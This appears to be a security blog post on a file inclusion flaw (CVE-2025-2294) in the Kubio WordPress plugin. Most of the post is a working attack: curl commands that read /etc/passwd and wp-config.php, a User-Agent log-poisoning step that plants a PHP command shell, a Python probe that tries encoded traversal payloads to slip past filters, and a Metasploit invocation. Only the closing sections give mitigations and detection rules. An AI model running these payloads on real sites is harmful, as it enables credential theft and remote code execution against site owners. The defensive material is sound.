WordPress Kubio Plugin LFI Exploit (CVE-2025-2294)


A critical Local File Inclusion (LFI) vulnerability, tracked as CVE-2025-2294, has been reported in the Kubio WordPress plugin, which has more than 90,000 active installations. The flaw lets an attacker (the requests below carry no session or nonce) read files the web server process can access, and depending on what the plugin does with the path it can be pushed further, for example to remote code execution (RCE) through log poisoning or to credential theft from wp-config.php.

Affected Versions:

  • Kubio Plugin versions ≤ 2.0.0

Exploit Details:

The vulnerability arises because a user-controlled value is used as a file path without sanitization or a containment check, so `../` sequences walk out of the plugin directory to arbitrary files such as /etc/passwd or wp-config.php. The number of `../` needed depends on the directory the plugin resolves the path from; surplus `../` collapse harmlessly once the path reaches `/`, so a generous count is the safe starting point.

You Should Know:

Manual Exploitation Steps (LFI)

1. Identify Vulnerable Endpoint:

curl -s "http://target.com/wp-content/plugins/kubio/page.php?file=../../../../etc/passwd"

If the response contains /etc/passwd entries (a line starting with root:x:0:0:), the site is vulnerable. A 404 or empty body at this depth does not clear the endpoint: increase the number of `../` before concluding it is safe.

2. Retrieve WordPress Config (wp-config.php):

curl -s "http://target.com/wp-content/plugins/kubio/page.php?file=../../../../wp-config.php" | grep DB_

This only works when the plugin reads the file back to the client. If the sink is include(), wp-config.php is executed rather than echoed and nothing comes out; the usual workaround is the php://filter base64 wrapper, which in turn only works if the sink accepts stream wrappers.

3. Log Poisoning (if the web server's access log is readable by the PHP process):

Apache writes the request line, Referer and User-Agent to the access log, not the POST body, so the PHP payload has to travel in one of those headers:

curl -s "http://target.com/" -A "<?php system(\$_GET['cmd']); ?>"

Then include the poisoned log and pass the command:

curl "http://target.com/wp-content/plugins/kubio/page.php?file=../../../../var/log/apache2/access.log&cmd=id"

The log path differs by distribution (/var/log/httpd/access_log on RHEL-style systems), the file is frequently not readable by www-data, and once poisoned every inclusion of the log executes everything in it, so send the payload exactly once.
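The three checks above can be wrapped in a small probe. This is an added example, not part of the original post or of the plugin; it assumes the page.php?file= endpoint quoted above and uses http://target.com as a placeholder. It goes beyond the single depth shown above by trying several traversal depths and encodings and by recognising the two target files from their content rather than from the HTTP status.

```python
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Iterator, Optional

# Assumptions for this example: the endpoint and parameter are the ones quoted
# in the steps above, and BASE_URL is a placeholder to replace with the target.
ENDPOINT = "/wp-content/plugins/kubio/page.php"
PARAM = "file"
BASE_URL = "http://target.com"

# Content fingerprints of the two files the steps above go after.
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)
WPCONFIG_RE = re.compile(r"define\(\s*['\"]DB_(?:NAME|USER|PASSWORD|HOST)['\"]")


def traversal_payloads(target_file: str, max_depth: int = 8) -> Iterator[str]:
    """Yield values for the file parameter, already in on-the-wire form.

    The right number of '../' depends on where the plugin resolves the path,
    so depths 1..max_depth are tried; surplus '../' collapse harmlessly at '/'.
    Each depth is followed by single- and double-encoded variants that slip
    past filters matching only the literal '../'.
    """
    rel = target_file.lstrip("/")
    for depth in range(1, max_depth + 1):
        plain = "../" * depth + rel
        yield plain
        yield plain.replace("../", "..%2f")       # encoded slash
        yield plain.replace("../", "%2e%2e%2f")   # encoded dots and slash
        yield plain.replace("../", "..%252f")     # double-encoded slash


def build_url(base_url: str, payload: str) -> str:
    """Concatenate without re-quoting so encoded variants reach the server
    exactly as written."""
    return f"{base_url}{ENDPOINT}?{PARAM}={payload}"


def classify(body: str) -> Optional[str]:
    """Tell a successful read from noise: 'passwd', 'wp-config' or None.

    If the sink is include() rather than a raw read, wp-config.php is executed
    instead of echoed, so None here does not prove the file is unreadable.
    """
    if PASSWD_RE.search(body):
        return "passwd"
    if WPCONFIG_RE.search(body):
        return "wp-config"
    return None


def probe(base_url: str, target_file: str, timeout: float = 10.0) -> Optional[str]:
    """Send each payload until one returns recognisable file content; return
    the URL that worked, or None. Needs network access; not used by the test."""
    for payload in traversal_payloads(target_file):
        url = build_url(base_url, payload)
        req = urllib.request.Request(url, headers={"User-Agent": "kubio-lfi-check"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read(65536).decode("utf-8", "replace")
        except (urllib.error.URLError, OSError):
            continue
        if classify(body):
            return url
    return None


if __name__ == "__main__":
    hit = probe(BASE_URL, "/etc/passwd")
    print(hit or "no traversal payload returned /etc/passwd")
```

Run it only against systems you are authorised to test; the distinctive User-Agent is there so the requests are easy to find again in the target's logs.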

Mitigation Steps:

  • Update the Kubio plugin to the patched release. This is the only real fix; the items below only limit what a successful traversal can reach.
  • Block direct HTTP access to files that should never be served, for example in wp-content/uploads (Apache 2.4 syntax):
    <FilesMatch "\.(php|log|ini)$">
    Require all denied
    </FilesMatch>
    
    Do not place this in the site root, where it would block WordPress itself, and do not expect it to stop an include()-based LFI: PHP reads the file from disk without an HTTP request, so access control never sees it.
  • Confine PHP's file access with open_basedir in php.ini or the vhost. It does not stop traversal inside the tree, so wp-config.php stays reachable, but /etc/passwd and the server logs outside it become unreadable:
    open_basedir = /var/www/html/
    

Automated Scanning (Metasploit):

First confirm that your Metasploit installation actually ships a module for this CVE (`search cve:2025-2294` or `search kubio` in msfconsole); if nothing is listed, fall back to the manual curl checks above.

msf6 > use auxiliary/scanner/http/wordpress_kubio_lfi 
msf6 > set RHOSTS target.com 
msf6 > run 

What Undercode Say:

This LFI flaw highlights the risk of using unvalidated file paths in WordPress plugins. System admins should:
– Monitor file inclusion attempts, including URL-encoded ones (-i also catches %2E):

grep -iE 'kubio/page\.php\?.*file=.*(\.\./|%2e%2e|\.\.%2f)' /var/log/apache2/access.log

– Use WAF Rules (ModSecurity). A rule needs an id (any unique value in a range you reserve; the one below is arbitrary), a phase, and decoding transformations, or it is rejected at startup and misses encoded payloads:

# id is an arbitrary value in a private range; keep it unique in your config
SecRule ARGS_GET:file "@rx (?:\.\./|^/|\x00)" \
    "id:1000100,phase:2,t:none,t:urlDecodeUni,t:urlDecodeUni,deny,status:403,log,msg:'Kubio LFI attempt'"

– Check active plugins periodically, and list the ones with a pending update:

wp plugin list --status=active --allow-root
wp plugin list --update=available --allow-root

Expected Output:

A WordPress instance where traversal requests against the plugin return nothing usable, the access log shows no unexplained `../` requests, and Kubio is at a patched version.


Reported By: Dersonbabayan Cve – Hackers Feeds
